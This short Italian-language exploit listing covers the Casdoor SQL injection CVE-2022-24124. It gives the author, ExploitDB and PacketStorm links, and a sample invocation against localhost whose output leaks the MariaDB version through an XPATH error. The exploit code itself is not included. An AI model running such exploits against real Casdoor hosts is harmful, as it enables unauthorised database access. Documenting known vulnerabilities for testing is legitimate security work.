
Esegui il dump della versione del database SQL sull'host che esegue Casdoor < 1.13.1
Codice exploit per CVE-2022-24124 noto come Casdoor SQL Injection
Link exploit: [ExploitDB-50792] [PacketStormSecurity]
Risultato atteso: dump della versione del database SQL sull'host che esegue Casdoor < 1.13.1
Destinato esclusivamente a scopi educativi e di test in ambienti aziendali.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1